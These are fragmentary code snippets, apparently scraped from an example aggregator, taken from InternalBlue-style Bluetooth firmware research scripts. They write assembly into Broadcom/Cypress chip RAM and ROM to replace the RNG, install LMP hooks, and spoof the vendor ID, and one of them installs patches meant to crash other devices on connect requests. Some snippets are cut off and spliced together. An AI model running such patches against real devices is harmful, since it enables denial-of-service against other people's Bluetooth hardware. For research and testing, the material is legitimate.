Example #1
0
 def recvPacket(self, record):
     hcipkt = record[0]
     if not issubclass(hcipkt.__class__, HCI_Event):
         return
     if hcipkt.event_code != 0xFF:
         return
     # TODO Android 8 introduced special handling for 0x57 HCI_VSE_SUBCODE_DEBUG_INFO_SUB_EVT,
     # stackdumps might no longer work
     if hcipkt.data[0] == 0x57:
         self.handleNexus6pStackDump(hcipkt)
     if hcipkt.data[0:4] == p32(0x039200F7):
         self.handleNexus5StackDump(hcipkt)
     # same header for S10 and evaluation board...
     if hcipkt.data[0:2] == p16(
         0x031B
     ):  # generated by bthci_event_vs_initializeCoredumpHdr()
         self.handleEvalStackDump(hcipkt)
         self.handleS10StackDump(hcipkt)
Example #2
0
# Disable original RNG
patch = asm(
    "bx lr; bx lr",
    vma=FUN_RNG)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(FUN_RNG, patch):
    internalblue.logger.critical("Could not disable original RNG!")
    exit(-1)

# CYW20735 Launch_RAM fix: overwrite an unused HCI handler
# The Launch_RAM handler is broken so we can just overwrite it to call the function we need.
# The handler table entry for it is at 0x1425BC, and it points to launch_RAM+1.
# Located by looking for bthci_cmd_vs_HandleLaunch_RAM+1 in the dump.
if not internalblue.patchRom(
        0x1425BC,
        p32(ASM_LOCATION_RNG + 1)):  # function table entries are sub+1
    internalblue.logger.critical("Could not implement our launch RAM fix!")
    exit(-1)

internalblue.logger.info("Installed all RNG hooks.")
"""
We cannot call HCI Read_RAM from this callback as it requires another callback (something goes wrong here),
so we cannot solve this recursively but need some global status variable. Still, polling this is way faster
than polling a status register in the Bluetooth firmware itself.
"""
# global status
internalblue.rnd_done = False


def rngStatusCallback(record):
    hcipkt = record[0]  # get HCI Event packet
Example #3
0
    exit(-1)

progress_log = internalblue.logger.info(
    "installing assembly patches to crash other device on connect requests...")

#progress_log = internalblue.logger.info("Writing ASM snippet for LMP 00 table lookup.")
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP,
                             data=code,
                             progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

#progress_log = internalblue.logger.info("Installing predefined hook for LMP table lookup.")
if not internalblue.writeMem(address=HOOK_LMP_00_LOOKUP,
                             data=p32(ASM_LOCATION_LMP_00_LOOKUP + 1),
                             progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

#progress_log = internalblue.logger.info("Writing ASM snippet for LMP VSC existence check.")
code = asm(ASM_SNIPPET_VSC_EXISTS, vma=ASM_LOCATION_VSC_EXISTS)
if not internalblue.writeMem(
        address=ASM_LOCATION_VSC_EXISTS, data=code, progress_log=progress_log):
    internalblue.logger.critical("error!")
    exit(-1)

# all send_lmp functions are in rom...
#internalblue.logger.info("Installing LMP VSC existence hook patch...")
patch = asm("b 0x%x" % ASM_LOCATION_VSC_EXISTS, vma=HOOK_VSC_EXISTS)
if not internalblue.patchRom(HOOK_VSC_EXISTS, patch):
Example #4
0
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

# Disable original RNG
patch = asm(
    "bx lr; bx lr",
    vma=FUN_RNG)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(FUN_RNG, patch):
    internalblue.logger.critical("Could not disable original RNG!")
    exit(-1)

# CYW20819 Launch_RAM fix: overwrite an unused HCI handler
# The Launch_RAM handler is broken so we can just overwrite it to call the function we need.
# The handler table entry for it is at 0xF2884, and it points to launch_RAM+1.
if not internalblue.patchRom(0xF2884, p32(ASM_LOCATION_RNG + 1)):  # 0x219001
    internalblue.logger.critical("Could not implement our launch RAM fix!")
    exit(-1)

# Disable functions that crash us when using the target memory region at 0x219000
patch = asm(
    "bx lr; bx lr",
    vma=0x79AC6)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(0x79AC6, patch):
    internalblue.logger.critical(
        "Could not disable original bcs_taskDeactivate_blocking!")
    exit(-1)

internalblue.logger.info("Installed all RNG hooks.")
"""
We cannot call HCI Read_RAM from this callback as it requires another callback (something goes wrong here),
# Older devices like the Nexus 5 only accept LMP BPCS from Broadcom,
# they don't know about Cypress yet...
internalblue.logger.info("Changing vendor ID from Cypress to Broadcom.")
if not internalblue.writeMem(address=0x2020f0, data=b'\x0f\x00\x00\x00', progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

internalblue.logger.info("Writing ASM snippet for LMP BPSC table lookup.")
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP, data=code, progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

internalblue.logger.info("Installing predefined hook for LMP BPSC table lookup.")
if not internalblue.writeMem(address=HOOK_LMP_00_LOOKUP, data=p32(ASM_LOCATION_LMP_00_LOOKUP + 1), progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

internalblue.logger.info("Writing ASM snippet for LMP BPSC existence check.")
code = asm(ASM_SNIPPET_VSC_EXISTS, vma=ASM_LOCATION_VSC_EXISTS)
if not internalblue.writeMem(address=ASM_LOCATION_VSC_EXISTS, data=code, progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

# all send_lmp functions are in rom...
internalblue.logger.info("Installing LMP BPSC existence hook patch...")
patch = asm("b 0x%x" % ASM_LOCATION_VSC_EXISTS, vma=HOOK_VSC_EXISTS)
if not internalblue.patchRom(HOOK_VSC_EXISTS, patch):
    internalblue.logger.critical("error!")
    exit(-1)